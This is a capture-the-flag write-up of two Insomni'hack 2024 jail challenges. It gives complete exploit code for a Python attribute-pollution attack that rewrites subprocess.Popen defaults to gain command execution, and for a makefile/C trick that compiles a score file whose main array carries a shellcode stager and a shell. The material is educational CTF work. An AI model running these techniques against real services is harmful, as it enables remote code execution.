insomni'hack teaser 2024
i, for one, am not afraid to seek answers to life's toughest questions
like "how well can a team of 2 people do in a 24 hour ctf when they start almost 12 hours late"
this is like, not bad actually???
anyway, let's talk about jails
PPP
(there was no flavor text for this one, it was just a flavor image of rihanna and i'm not gonna like go download it and then rehost it here so just imagine that's what's here)
we can see immediately that the flag is inaccessible to the challenge user, and the only way to get it is to execute the command /readflag Please (immediately because i just like, ran the binary and found out that's what it does. i didn't bother reversing it at all)
here's the code for the challenge server
from os import popen
import hashlib, time, math, subprocess, json

def response(res):
    print(res + ' | ' + popen('date').read())
    exit()

def generate_nonce():
    current_time = time.time()
    rounded_time = round(current_time / 60) * 60 # Round to the nearest 1 minutes (60 seconds)
    return hashlib.sha256(str(int(rounded_time)).encode()).hexdigest()

def is_valid_proof(data, nonce):
    DIFFICULTY_LEVEL = 6
    guess_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
    return guess_hash[:DIFFICULTY_LEVEL] == '0' * DIFFICULTY_LEVEL

class Blacklist:
    def __init__(self, data, nonce):
        self.data = data
        self.nonce = nonce

    def get_data(self):
        out = {}
        out['data'] = self.data if 'data' in self.__dict__ else ()
        out['nonce'] = self.nonce if 'nonce' in self.__dict__ else ()
        return out

def add_to_blacklist(src, dst):
    for key, value in src.items():
        if hasattr(dst, '__getitem__'):
            if dst[key] and type(value) == dict:
                add_to_blacklist(value, dst.get(key))
            else:
                dst[key] = value
        elif hasattr(dst, key) and type(value) == dict:
            add_to_blacklist(value, getattr(dst, key))
        else:
            setattr(dst, key, value)

def lists_to_set(data):
    if type(data) == dict:
        res = {}
        for key, value in data.items():
            res[key] = lists_to_set(value)
    elif type(data) == list:
        res = ()
        for value in data:
            res = (*res, lists_to_set(value))
    else:
        res = data
    return res

def is_blacklisted(json_input):
    bl_data = blacklist.get_data()
    if json_input['data'] in bl_data['data']:
        return True
    if json_input['nonce'] in bl_data['nonce']:
        return True
    json_input = lists_to_set(json_input)
    add_to_blacklist(json_input, blacklist)
    return False

if __name__ == '__main__':
    blacklist = Blacklist(['dd9ae2332089200c4d138f3ff5abfaac26b7d3a451edf49dc015b7a0a737c794'], ['2bfd99b0167eb0f400a1c6e54e0b81f374d6162b10148598810d5ff8ef21722d'])
    try:
        json_input = json.loads(input('Prove your work 😼\n'))
    except Exception:
        response('no')
    if not isinstance(json_input, dict):
        response('message')
    data = json_input.get('data')
    nonce = json_input.get('nonce')
    client_hash = json_input.get('hash')
    if not (data and nonce and client_hash):
        response('Missing data, nonce, or hash')
    server_nonce = generate_nonce()
    if server_nonce != nonce:
        response('nonce error')
    if not is_valid_proof(data, nonce):
        response('Proof of work is invalid')
    server_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
    if server_hash != client_hash:
        response('Hash does not match')
    if is_blacklisted(json_input):
        response('blacklisted PoW')
    response('Congratulation, You\'ve proved your work 🎷🐴')
there's a proof-of-work segment (sigh), checking that your input doesn't belong to a set of disallowed inputs and then...seemingly nothing!
where's the primitive???
normally what i'll loosely call "pyjail" style challenges have some sort of core execution primitive, like doing an eval on user-supplied code, subject to some sandboxing, or maybe AST sanitization, or perhaps being able to replace bytecode on function objects. this code is interesting because it doesn't do any of that, yet we can assume that at some point we gain the ability to execute /readflag Please to read the flag
instead, after verifying the proof of work, the input goes through is_blacklisted, where it is
- transformed by lists_to_set
  - this function converts any lists nested at any level in the data structure to tuples
  - there's literally no need for this for normal functioning of the server, so we could assume it's an important part of the solution. (this turns out to be correct)
- processed by add_to_blacklist
  - this merges the user input with the Blacklist object instance recursively, handling dicts and object attributes along the way
when something looks weird it's worth thinking about it because that can help greatly narrow the search space for a solution. in this case, we can assume that solutions would involve tuples somehow, because we're given this primitive that serves no other useful purpose than to produce tuples
so the primitive is assignment to values at any depth of objects reachable from the starting object instance, of any type supported by json
the targets of this primitive are any object that can be found by recursively traversing using
- dict lookups
- attribute lookups
and the values that can be changed or added are
- None
- strings
- ints and floats
- booleans
- dicts of any of this
- tuples of any of this
an important thing we can't do is assign an existing runtime value (some other object we'd have to look up first) as the new value: we can only write values that can be spelled in json. in other words, this is a write-only primitive
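to make the primitive concrete, here's a minimal sketch that feeds a json document through the two functions from the server against a toy object. the Inner and Outer classes are made up for illustration, they're not part of the challenge.

```python
import json

def lists_to_set(data):
    # copied from the challenge: lists become tuples, dicts are rebuilt recursively
    if type(data) == dict:
        res = {}
        for key, value in data.items():
            res[key] = lists_to_set(value)
    elif type(data) == list:
        res = ()
        for value in data:
            res = (*res, lists_to_set(value))
    else:
        res = data
    return res

def add_to_blacklist(src, dst):
    # copied from the challenge: recursive merge of src into dst
    for key, value in src.items():
        if hasattr(dst, '__getitem__'):
            if dst[key] and type(value) == dict:
                add_to_blacklist(value, dst.get(key))
            else:
                dst[key] = value
        elif hasattr(dst, key) and type(value) == dict:
            add_to_blacklist(value, getattr(dst, key))
        else:
            setattr(dst, key, value)

class Inner:  # hypothetical stand-in for "some object reachable by attribute lookup"
    def __init__(self):
        self.value = 1

class Outer:  # hypothetical stand-in for the Blacklist instance
    def __init__(self):
        self.inner = Inner()
        self.table = {"k": "old"}

outer = Outer()
payload = json.loads('{"inner": {"value": [1, 2]}, "table": {"k": "new"}}')
add_to_blacklist(lists_to_set(payload), outer)

print(outer.inner.value)  # the json list arrives as a tuple
print(outer.table)        # the existing dict key was overwritten in place
```

note that every value written here came straight out of the json document, which is the "write-only" part.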
fucking around in ipython
a good approach to pyjails is to press the . key and then hit tab a bunch of times in ipython. seriously. so let's go do that for a second
Python 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.18.1 -- An enhanced Interactive Python. Type '?' for help.
[ins] In [1]: import ppp
[ins] In [2]: obj = ppp.Blacklist(['x'], ['y'])
[ins] In [3]: obj.__
the object has its usual defined attributes, and then the set of python intrinsic double underscore attributes. the goal here is to get a reference to anything interesting, with a specific focus on stuff that is tuples
unfortunately the object itself is not that interesting. __class__ is a useful thing to get references to other random stuff but we get stuck at the __subclasses__() barrier because that's a function and we can't call functions. most of this stuff is also read-only, so that doesn't help us either
let's look at the function get_data
[ins] In [3]: obj.get_data.__
i was expecting there to be like __code__ in here but there wasn't. so i quickly learned that this is a bound instance of the underlying function, which python has a dedicated object for, and the underlying function can be accessed with __func__
[ins] In [3]: obj.get_data.__func__.__
so there's the __code__ attribute which can be used to replace the bytecode of the function, but only if you call the replace function, the attributes can't be written directly. there's some other stuff in here but it's mostly function calls and not that interesting. __module__ would be nice if it were a reference to the actual module and not just the name of it but oh well
one thing i found here that is really interesting is __defaults__ and __kwdefaults__
__defaults__
__defaults__ stores the default arguments for the function, if it was defined with default arguments
[ins] In [1]: def my_func(a="default value"):
         ...:     print(a)
         ...:
[ins] In [2]: my_func.__defaults__
Out[2]: ('default value',)
__kwdefaults__ similarly stores the defaults for keyword-only arguments
notice how __defaults__ takes a tuple. and it's settable
[ins] In [3]: my_func.__defaults__ = ("lol hacked",)
[ins] In [4]: my_func()
lol hacked
it's all coming together,,,
unfortunately get_data doesn't take any arguments. so we'll have to find something else to do this on
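for completeness, here's a small sketch of the keyword-only counterpart. the fetch function is made up for illustration. it has no positional defaults, so __defaults__ is None, and its keyword-only default lives in the __kwdefaults__ dict, which is also settable.

```python
def fetch(url, *, timeout=5):  # hypothetical function with one keyword-only default
    return (url, timeout)

before = (fetch.__defaults__, fetch.__kwdefaults__)
print(before)  # positional defaults first, keyword-only defaults second

# keyword-only defaults are stored in a plain dict, keyed by parameter name
fetch.__kwdefaults__ = {"timeout": 99}
after = fetch("x")
print(after)
```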
going deeper
backtracking, there is one more useful key in the function's attributes: __globals__
[ins] In [3]: obj.get_data.__func__.__globals__
{
[...snip...]
'popen': <function os.popen(cmd, mode='r', buffering=-1)>,
'hashlib': <module 'hashlib' from '/usr/lib/python3.11/hashlib.py'>,
'time': <module 'time' (built-in)>,
'math': <module 'math' from '/usr/lib/python3.11/lib-dynload/math.cpython-311-x86_64-linux-gnu.so'>,
'subprocess': <module 'subprocess' from '/usr/lib/python3.11/subprocess.py'>,
'json': <module 'json' from '/usr/lib/python3.11/json/__init__.py'>,
'response': <function ppp.response(res)>,
'generate_nonce': <function ppp.generate_nonce()>,
'is_valid_proof': <function ppp.is_valid_proof(data, nonce)>,
'Blacklist': ppp.Blacklist,
'add_to_blacklist': <function ppp.add_to_blacklist(src, dst)>,
'lists_to_set': <function ppp.lists_to_set(data)>,
'is_blacklisted': <function ppp.is_blacklisted(json_input)>}
neat
remember that the goal is to execute a command with an argument. taking a look at the actual ppp module, the only remotely similar thing is the call to popen in the response function. we also see that subprocess is imported but not used (huh i wonder why that is,). so we have popen in scope here, let's try to bonk it
# VxWorks has no user space shell provided. As a result, running
# command in a shell can't be supported.
if sys.platform != 'vxworks':
    # Supply os.popen()
    def popen(cmd, mode="r", buffering=-1):
        if not isinstance(cmd, str):
            raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
        if mode not in ("r", "w"):
            raise ValueError("invalid mode %r" % mode)
        if buffering == 0 or buffering is None:
            raise ValueError("popen() does not support unbuffered streams")
        import subprocess
        if mode == "r":
            proc = subprocess.Popen(cmd,
                                    shell=True, text=True,
                                    stdout=subprocess.PIPE,
                                    bufsize=buffering)
            return _wrap_close(proc.stdout, proc)
        else:
            proc = subprocess.Popen(cmd,
                                    shell=True, text=True,
                                    stdin=subprocess.PIPE,
                                    bufsize=buffering)
            return _wrap_close(proc.stdin, proc)
ok so let's just try to change the defaults
[ins] In [1]: from os import popen
[ins] In [2]: popen.__defaults__ = ("/readflag Please", "r", -1)
[ins] In [3]: popen
Out[3]: <function os.popen(cmd='/readflag Please', mode='r', buffering=-1)>
[ins] In [4]: popen("date").read()
Out[4]: 'Sun Jan 21 08:05:37 PM EST 2024\n'
so unfortunately when the cmd argument is provided, we can't override it using the defaults. this makes sense
os.popen uses subprocess.Popen internally. hey remember how subprocess is imported but never used so it's in the __globals__?? wow that sure is convenient!
let's set defaults on subprocess.Popen
class Popen:
    # ....
    def __init__(self, args, bufsize=-1, executable=None,
                 stdin=None, stdout=None, stderr=None,
                 preexec_fn=None, close_fds=True,
                 shell=False, cwd=None, env=None, universal_newlines=None,
                 startupinfo=None, creationflags=0,
                 restore_signals=True, start_new_session=False,
                 pass_fds=(), *, user=None, group=None, extra_groups=None,
                 encoding=None, errors=None, text=None, umask=-1, pipesize=-1,
                 process_group=None):
        """Create new Popen instance."""
        # ...
what os.popen passes explicitly is args, shell, text, stdout, and bufsize, so we can't override those. but we can assign a new default value to anything else
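here's a toy sketch of that situation. inner and outer are made-up stand-ins for subprocess.Popen.__init__ and os.popen with a much shorter signature. the wrapper pins some arguments, and rewriting the inner function's __defaults__ only changes the ones the wrapper leaves out.

```python
def inner(args, bufsize=-1, executable=None, shell=False, env=None):
    # hypothetical stand-in for Popen.__init__: just report what it received
    return {"args": args, "bufsize": bufsize, "executable": executable,
            "shell": shell, "env": env}

def outer(cmd):
    # hypothetical stand-in for os.popen: passes args, shell and bufsize explicitly
    return inner(cmd, shell=True, bufsize=-1)

# one entry per defaulted positional parameter, in order:
# bufsize, executable, shell, env
inner.__defaults__ = (1234, "/some/other/shell", False, {"SOME_VAR": "1"})

result = outer("date")
print(result)
```

bufsize and shell keep the values the wrapper passed, while executable and env pick up the new defaults.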
at this point we could try the basic approach of setting executable to /readflag, but since there is no control of the argument to /readflag this won't work. how else can we input a full command with an argument?
to the bash man pages!
one possible way to control the behavior of the shell that is launched (we can choose bash or the default sh [dash] based on the executable parameter) is via environment variables
so i opened up the man page for bash..........and then i immediately gave up and just asked @rhelmot whether there was any cheese with bash environment variables you could do, and she offered up BASH_ENV
BASH_ENV
If this parameter is set when bash is executing a shell script, its value is interpreted as a
filename containing commands to initialize the shell, as in ~/.bashrc. The value of BASH_ENV
is subjected to parameter expansion, command substitution, and arithmetic expansion before
being interpreted as a filename. PATH is not used to search for the resultant filename.
unfortunately, BASH_ENV needs to be a filename instead of just a list of commands. so to solve the issue of having a file @rhelmot suggested /proc/self/environ. unfortunately this doesn't work because the size of the file as reported by the kernel is 0, and bash actually uses that when reading it:
BASH_ENV=/proc/self/environ AAAA="$(printf '\n\necho hacked\n')" strace /bin/bash -c "date"
....
openat(AT_FDCWD, "/proc/self/environ", O_RDONLY) = 3
newfstatat(3, "", {st_mode=S_IFREG|0400, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "", 0) = 0
close(3) = 0
....
u_u
however there is another thing we can do which is to just use stdin, because the original stdin is still bound to the process that gets executed! so we can pass BASH_ENV as /proc/self/fd/0 and then provide the additional command to run as input. this also requires us to call shutdown on the socket to the remote in order to close the stream
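a rough local sketch of the stdin trick, assuming linux with /proc mounted and bash installed. run_with_stdin_startup is a made-up helper name. it runs a harmless command under bash with BASH_ENV pointed at /proc/self/fd/0 and feeds the "startup file" through a pipe, which gets closed after writing, the same way shutdown closes the stream on the remote.

```python
import os
import shutil
import subprocess

def run_with_stdin_startup(startup_script, command="true"):
    """run `bash -c command` with BASH_ENV=/proc/self/fd/0.

    returns the captured stdout, or None when bash or /proc is unavailable.
    """
    bash = shutil.which("bash")
    if bash is None or not os.path.isdir("/proc/self/fd"):
        return None
    env = dict(os.environ, BASH_ENV="/proc/self/fd/0")
    proc = subprocess.run(
        [bash, "-c", command],
        input=startup_script,   # written to the child's stdin, then the pipe is closed
        env=env,
        capture_output=True,
        text=True,
        timeout=10,
    )
    return proc.stdout

out = run_with_stdin_startup("echo injected\n")
print(out)
```

the command itself is just `true`, so anything printed should come from the script bash read off its stdin while starting up.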
putting it together
assembly of the final exploit:
popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False,
                  None, {"BASH_ENV":"/proc/self/fd/0"}, None, None, 0, True, False, []]
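this defines the defaults tuple that gets assigned to Popen.__init__.__defaults__, kept the same as the original except for executable /bin/bash and environment with BASH_ENV. it's written as a list here because json has no tuples. lists_to_set on the server is what turns it into the tuple that __defaults__ requires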
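import hashlib, secrets
import tqdm
import ppp  # the challenge server source, saved locally as ppp.py

for _ in tqdm.trange(50000000):
    nonce = ppp.generate_nonce()
    data = secrets.token_hex(16)
    if ppp.is_valid_proof(data, nonce):
        break
else:
    raise Exception("oops")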
hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
this generates the proof of work. we just steal the original code's nonce generator and validation function
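here's a standalone sketch of the same search with a much lower difficulty, so it finishes instantly. generate_nonce follows the server's rounding but takes an optional timestamp, and solve uses a counter instead of random tokens. both of those tweaks are mine, not the server's. one thing the rounding implies is that the nonce rolls over at the half-minute mark, so a solution has to be found and submitted inside that window.

```python
import hashlib
import itertools
import time

def generate_nonce(now=None):
    # same rounding as the server: nearest minute, then sha256 of the integer timestamp
    now = time.time() if now is None else now
    rounded = round(now / 60) * 60
    return hashlib.sha256(str(int(rounded)).encode()).hexdigest()

def solve(nonce, difficulty):
    # try "0", "1", "2", ... (hex) until the hash has enough leading zero digits
    prefix = "0" * difficulty
    for counter in itertools.count():
        data = f"{counter:x}"
        digest = hashlib.sha256(f"{data}{nonce}".encode()).hexdigest()
        if digest.startswith(prefix):
            return data, digest

# fixed timestamps so the demo is reproducible
nonce = generate_nonce(now=1705885537)
same_window = generate_nonce(now=1705885540)   # 3 seconds later, same nonce
other_window = generate_nonce(now=1705885520)  # before the half-minute mark

data, digest = solve(nonce, difficulty=3)
print(data, digest)
```

the real server wants 6 leading zero hex digits, which is roughly 16 million hashes on average.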
obj = {
    "data": data,
    "nonce": nonce,
    "hash": hash,
    "get_data": {
        "__func__": {
            "__globals__": {
                "subprocess": {
                    "Popen": {
                        "__init__": {
                            "__defaults__": popen_defaults
                        }
                    }
                }
            }
        }
    }
}
payload = json.dumps(obj)
this assembles the payload with the proof of work along with the attribute we're setting
the attribute written out is
.get_data.__func__.__globals__["subprocess"].Popen.__init__.__defaults__
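the nesting can also be generated from the path instead of typed out by hand. a small sketch, where nest is a made-up helper and the value is a placeholder:

```python
import json

def nest(path, value):
    """wrap value in one dict per path component, innermost component last"""
    for key in reversed(path):
        value = {key: value}
    return value

path = ["get_data", "__func__", "__globals__", "subprocess",
        "Popen", "__init__", "__defaults__"]
write = nest(path, ["placeholder"])
print(json.dumps(write))
```

each path component is either an attribute name or a dict key. add_to_blacklist figures out which one applies based on whether the current object has __getitem__.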
finally, we run the exploit
print("running")
r = remote("ppp.insomnihack.ch", 12345)
print(r.recvline())
r.sendline(payload)
r.sendline("/readflag Please")
and here we call shutdown to close the stdin stream on the remote
r.shutdown('send')
r.interactive()
normally, we should be done here, however this didn't seem to work on the remote
that's right, get nagled
turns out the issue (probably?) was that somehow pwntools is not setting TCP_NODELAY and thus the stage 1 and stage 2 payloads were probably getting combined into the same packet or somehow not sent at all. i had intuition for nagling being a thing that exists so i didn't debug this issue at all i just added
r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
this made the exploit work at the time, though when testing it further i realized it's still kind of unstable, and i'm not actually sure how it managed to work the first time during the CTF. oh well. it works locally so i'm not super concerned
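for reference, the same option on a plain socket, no pwntools involved. this is just a sketch showing that the option can be set and read back before connecting. it says nothing about whether nagling was really the culprit.

```python
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # disable nagle's algorithm so small writes go out without waiting to be coalesced
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    nodelay = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
finally:
    sock.close()

print(bool(nodelay))
```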
terminal pursuit
it's a makefile/c jail
During COVID a friend of mine decided to learn coding by implementing a game he loves: Trivial Pursuit. He started with C but, finding it too difficult, he switched to python midway through.
Terminal Pursuit is the result of his work. I take no responsibility at all, all what I have done was dockerize the thing, it may be broken, I'll let you figure that out...
nc terminal-pursuit.insomnihack.ch 1337
there's a bunch of jail stuff that ends up being kind of unimportant, but after taking a look we can see the structure of the server
- main.py: contains the main interaction mode
- quizzes/Makefile: builds the quiz binaries (in C)
- quizzes/*.c: the quiz binaries
- quizzes/pts.txt: the score file appended to by the quiz binaries
main.py
i've cut it down to just the most important parts
alphabet = "abcdefghijklmnopqrstuvwxyz/,:;[]_-."
# ....
def get_user_string(text):
    print(text)
    s = input("> ").lower()
    for c in s:
        if c not in alphabet:
            exit(0)
    return s[:7]
this defines the allowed user input. inputs are lowercased, every character must come from the very restricted alphabet (otherwise the server exits), and only the first 7 characters are kept
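a quick sketch for trying candidate inputs against the filter offline. filter_input is a made-up variant of get_user_string that returns None where the server would exit, and the candidates are arbitrary.

```python
ALPHABET = "abcdefghijklmnopqrstuvwxyz/,:;[]_-."

def filter_input(s):
    """like get_user_string, but returns None instead of exiting on a bad character"""
    s = s.lower()
    for c in s:
        if c not in ALPHABET:
            return None
    return s[:7]

candidates = ["books", "pts.txt", "Main[]", "a b", "main()", "abcdefghij"]
results = {c: filter_input(c) for c in candidates}
for candidate, result in results.items():
    print(repr(candidate), "->", repr(result))
```

digits, spaces, quotes, parentheses and braces are all out, but /, ;, [ and ] survive.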
def run_quizz(username, category):
    command = f"make run quizz=\"{prefix + category}\" username=\"{username}\""
    os.system(command)

def play():
    username = get_user_string(gui.username)
    category = get_user_string(gui.category)
    run_quizz(username, category)
each quiz is run by prompting the user for their username, and the name of the quiz, and then calling make with the parameters. the makefile then builds and runs the specified quiz binary
CC = gcc
CFLAGS = -x c -w

ifeq ($(findstring .,$(quizz)),)
override quizz:=$(quizz).c
endif

run: build
	@./run "$(username)"

build:
	@$(CC) $(CFLAGS) "$(quizz)" -o run
the makefile also appends a .c to the quiz name if it doesn't already have a . in it. additionally it uses the -x c parameter to force the source language to be C. it's interesting that it does this because the provided quizzes, books.c, ctf.c, and miscgod.c are all obviously C files, and the -x c option shouldn't be needed for those. let's make a note of this
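the makefile's name handling is small enough to mirror in a few lines. this is only a sketch of the logic: resolve_quiz and build_command are made-up names, and it ignores whatever prefix main.py prepends to the category.

```python
def resolve_quiz(quizz):
    # mirrors `ifeq ($(findstring .,$(quizz)),)`: append .c only when there is no dot
    return quizz if "." in quizz else quizz + ".c"

def build_command(quizz):
    # the argv the build rule would hand to gcc, with CFLAGS expanded
    return ["gcc", "-x", "c", "-w", resolve_quiz(quizz), "-o", "run"]

for name in ["books", "miscgod", "pts.txt"]:
    print(name, "->", " ".join(build_command(name)))
```

so any name that already contains a dot is passed to gcc untouched, and -x c means gcc won't care what the extension is.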
here's an example of a quiz, in books.c (note only books.c and miscgod.c are defined, ctf.c doesn't contain any quiz code)
// ...
const int LEN = 6;
const char *QUESTIONS[] = {
    // ...
};
const int SOLUTIONS[] = { 1, 1, 1, 1, 1, 1, };

/******************
 * Main
 ******************/
int main(int argc, char* argv[]) {
    setvbuf(stdout, NULL, _IONBF, 0);
    FILE *file;
    file = fopen(scores_file, "a");
    fprintf(file,"%s = {", argv[1]);
    int answer;
    int score = 0;
    for (int i = 0; i < LEN; i++) {
        printf("%s\n", QUESTIONS[i]);
        printf("Your answer: ");
        scanf("%d", &answer);
        if (answer == SOLUTIONS[i]) {
            score++;
            printf("Correct!\n\n");
        } else {
            printf("False!\n\n");
        }
        fprintf(file, "%d,", answer);
    }
    fprintf(file, "%d}\n", score);
    fclose(file);
}
we can see that the quiz asks the user for a series of answer inputs, reads them with scanf("%d"), and produces a score file consisting of the provided username, a list of the answers, and the final score. for example, if we play books as username user, the resulting pts.txt file will look like this
user = {1,2,3,4,5,6,1}
and that's it. that's all you get
revisiting -x c
since there's no obvious code execution primitives in the code, we can assume that some trickery is needed to gain code execution. notice that pts.txt is in the quizzes directory. also, it's an allowed input because it's 7 chars and only uses allowed characters. what happens if we try to run the quiz pts.txt?
$ make username=user quizz=pts.txt
pts.txt:1:1: error: expected ‘,’ or ‘;’ at end of input
1 | user = {1,2,3,4,5,6,1}
| ^~~~
make: *** [Makefile:12: build] Error 1
huh, neat
the cflag -x c in the makefile ensures that gcc compiles pts.txt as if it was C source. now clearly as it stands it's not quite C, but maybe we can make this work
when is main not a function
one thing that stands out here is the ability to assign a variable as a compound integer initializer. this can be used to define things that are normally, y'know, functions, as arrays of integers, and it still works when compiled because gcc puts the integer bytes into the binary, and the integer bytes are valid instructions. see the post "main is usually a function. so then when is it not?"
that post comes up with the following
const int main[] = {
-443987883, 440, 113408, -1922629632,
4149, 899584, 84869120, 15544,
266023168, 1818576901, 1461743468, 1684828783,
-1017312735
};
this actually compiles, and interestingly enough just main = { .... }; still compiles, but doesn't run because main gets put in .data which is not normally executable. hence the const in the above example. that actually causes main to get put in .rodata
gcc -x c -w - <<EOF
const int main[] = {
-443987883, 440, 113408, -1922629632,
4149, 899584, 84869120, 15544,
266023168, 1818576901, 1461743468, 1684828783,
-1017312735
};
EOF
objdump -x a.out | grep main
0000000000000000 F *UND* 0000000000000000 __libc_start_main@GLIBC_2.34
0000000000002020 g O .rodata 0000000000000034 main
on x86-64 .rodata gets put in a PT_LOAD segment that is executable, alongside .text, so we end up with an executable main function this way
so basically the plan is to put integers representing shellcode for the main function in as the answers to a quiz, then invoke the quiz pts.txt in order to cause the result to be executed
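the bytes-to-integers step can be sketched without any tooling. to_int_array is a made-up helper, and the 9 bytes below are a hand-assembled x86-64 exit(0), picked because it's tiny.

```python
import struct

def to_int_array(code):
    """pad machine code to a multiple of 4 bytes and read it as little-endian signed 32-bit ints"""
    code = code + b"\x00" * (-len(code) % 4)
    return list(struct.unpack(f"<{len(code) // 4}i", code))

# hand-assembled x86-64: exit(0)
exit0 = bytes.fromhex(
    "b83c000000"  # mov eax, 60 (SYS_exit)
    "31ff"        # xor edi, edi
    "0f05"        # syscall
)

values = to_int_array(exit0)
source = "const int main[] = {" + ", ".join(map(str, values)) + "};"
print(source)
```

signed ints matter here because the quiz reads answers with scanf("%d"), so any chunk with the top bit set has to be typed as a negative number.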
sizecoding time
we have 2 functioning quizzes available, one with 6 questions, and one with 12. they're otherwise identical. the 12-question quiz (miscgod) gives the most room for shellcode (48 bytes)
what i did here was actually build a stager for a second stage of shellcode, even though this was completely unnecessary because you can fit an execve call in 48 bytes (in fact pwntools' shellcode is exactly that). the stager uses 2 syscalls to mmap a new rwx page and then read shellcode into it and then jump to it
so using my amazing assembly sizecoding skills i,,,,, went to godbolt and turned on -Os and wrote the shellcode in C
#include <sys/syscall.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/mman.h>

#define rv(x) register uint64_t x asm(#x)

void test(){
    rv(rax) = SYS_mmap;
    rv(rdi) = 0;
    rv(rsi) = 4096;
    rv(rdx) = PROT_READ | PROT_WRITE | PROT_EXEC;
    rv(r10) = MAP_SHARED | MAP_ANONYMOUS;
    rv(r8) = -1;
    rv(r9) = 0;
    asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx),"r"(r10),
        "r"(r8),"r"(r9):"memory");
    void (*tmp)(void) = (void*)rax;
    rdi = 0;
    rsi = rax;
    rax = 0;
    rdx = 4096;
    asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx):"memory");
    tmp();
}
this produces
test:
    mov eax, 9
    xor edi, edi
    mov esi, 4096
    or r8, -1
    mov edx, 7
    mov r10d, 33
    xor r9d, r9d
    syscall
    mov edx, 4096
    mov rcx, rax
    mov rsi, rax
    xor eax, eax
    syscall
    jmp rcx
it's 49 bytes. damn
there's a trick to save some more bytes which is to push rax after the mmap and ret at the end. this gets us down to 46 bytes
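the byte counts can be tallied per instruction. the hex encodings below are hand-derived and should be treated as an assumption: an assembler may pick different encodings for some of these, though they should come out the same length.

```python
# (instruction, hand-derived x86-64 encoding as hex)
COMMON = [
    ("mov eax, 9",    "b809000000"),
    ("xor edi, edi",  "31ff"),
    ("mov esi, 4096", "be00100000"),
    ("or r8, -1",     "4983c8ff"),
    ("mov edx, 7",    "ba07000000"),
    ("mov r10d, 33",  "41ba21000000"),
    ("xor r9d, r9d",  "4531c9"),
    ("syscall",       "0f05"),
    ("mov edx, 4096", "ba00100000"),
]
JMP_TAIL = [  # compiler output: keep the page address in rcx, jump to it
    ("mov rcx, rax", "4889c1"),
    ("mov rsi, rax", "4889c6"),
    ("xor eax, eax", "31c0"),
    ("syscall",      "0f05"),
    ("jmp rcx",      "ffe1"),
]
RET_TAIL = [  # hand-tuned: keep the page address on the stack, return into it
    ("mov rsi, rax", "4889c6"),
    ("push rax",     "50"),
    ("xor eax, eax", "31c0"),
    ("syscall",      "0f05"),
    ("ret",          "c3"),
]

def size(instructions):
    return sum(len(bytes.fromhex(encoding)) for _, encoding in instructions)

jmp_size = size(COMMON + JMP_TAIL)
ret_size = size(COMMON + RET_TAIL)
print(jmp_size, ret_size)
```

the saving comes from swapping the 3-byte mov rcx, rax and 2-byte jmp rcx for a 1-byte push and a 1-byte ret.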
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
and then the second stage is just the normal pwntools shellcode, which again, i didn't realize would have worked on its own. oh well
fixing the formatting
so there's still the slight problem that the pts.txt file isn't quite valid C syntax as it stands. we can fix that, because we're allowed the / character, which means we can insert comments. additionally, we can use ;// at the end to add the necessary semicolon (and comment out the rest)
for this we can use the usernames const//, int//, main[], and ;//, so the final points file will look like this
const// = { ... }
int// = { ... }
main[] = { shellcode int values here }
;// = { ... }
this becomes a valid C file in the right format
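to double check the idea, here's a sketch that builds the four lines the way the quiz binary's fprintf calls would and then drops the // comments, which is roughly what the compiler ends up seeing. score_line is a made-up helper, and the answers and scores are placeholders rather than real shellcode.

```python
import re

def score_line(username, answers, score):
    # same shape the quiz binary writes: "<username> = {a,b,...,score}"
    return f"{username} = {{{','.join(map(str, answers))},{score}}}"

lines = [
    score_line("const//", [0] * 12, 0),
    score_line("int//", [0] * 12, 0),
    score_line("main[]", list(range(1, 13)), 0),  # placeholder ints, not shellcode
    score_line(";//", [0] * 12, 0),
]
pts_txt = "\n".join(lines) + "\n"
print(pts_txt)

# strip everything from // to end of line, then join what is left
stripped = " ".join(re.sub(r"//.*", "", line).strip() for line in lines)
print(stripped)
```

the score gets appended as a 13th array element after the 12 answers, which just sits past the end of the shellcode.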
putting it together
stage1 = """
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
"""
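from pwn import *
import struct

context.arch = "amd64"  # assumption: needed so asm() and shellcraft target x86-64
stage1_bin = asm(stage1)
assert len(stage1_bin) == 46
stage1_bin = stage1_bin + b"\x00\x00"  # pad to 48 bytes = 12 ints
stage1_payload = list(struct.unpack("<iiiiiiiiiiii", stage1_bin))
stage2 = shellcraft.linux.sh()
stage2_bin = asm(stage2).ljust(4096, b"\x00")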
this defines the stage 1 and stage 2 shellcodes to run in the exploit
games = [
    {"quiz": "miscgod", "username": "const//", "answers": [0]*12},
    {"quiz": "miscgod", "username": "int//", "answers": [0]*12},
    {"quiz": "miscgod", "username": "main[]", "answers": stage1_payload},
    {"quiz": "miscgod", "username": ";//", "answers": [0]*12},
    {"quiz": "pts.txt", "username": "hacked", "rawinput": stage2_bin},
]
this is a compact representation of the quiz games we're going to play in order to format the points file the right way
def play_game(r, game):
    r.sendlineafter(b"> ", b"1")
    r.sendlineafter(b"> ", game["username"].encode())
    r.sendlineafter(b"> ", game["quiz"].encode())
    if "answers" in game:
        for answer in game["answers"]:
            r.sendlineafter(b"answer: ", str(answer).encode())
    else:
        r.send(game["rawinput"])
finally, we define the utility function to play a game from a given game specification, and then run the exploit
def run(host="localhost"):
    r = remote(host, 1337)
    for game in games:
        play_game(r, game)
    r.interactive()
this should pop a shell, and from there the flag can be read out
conclusion
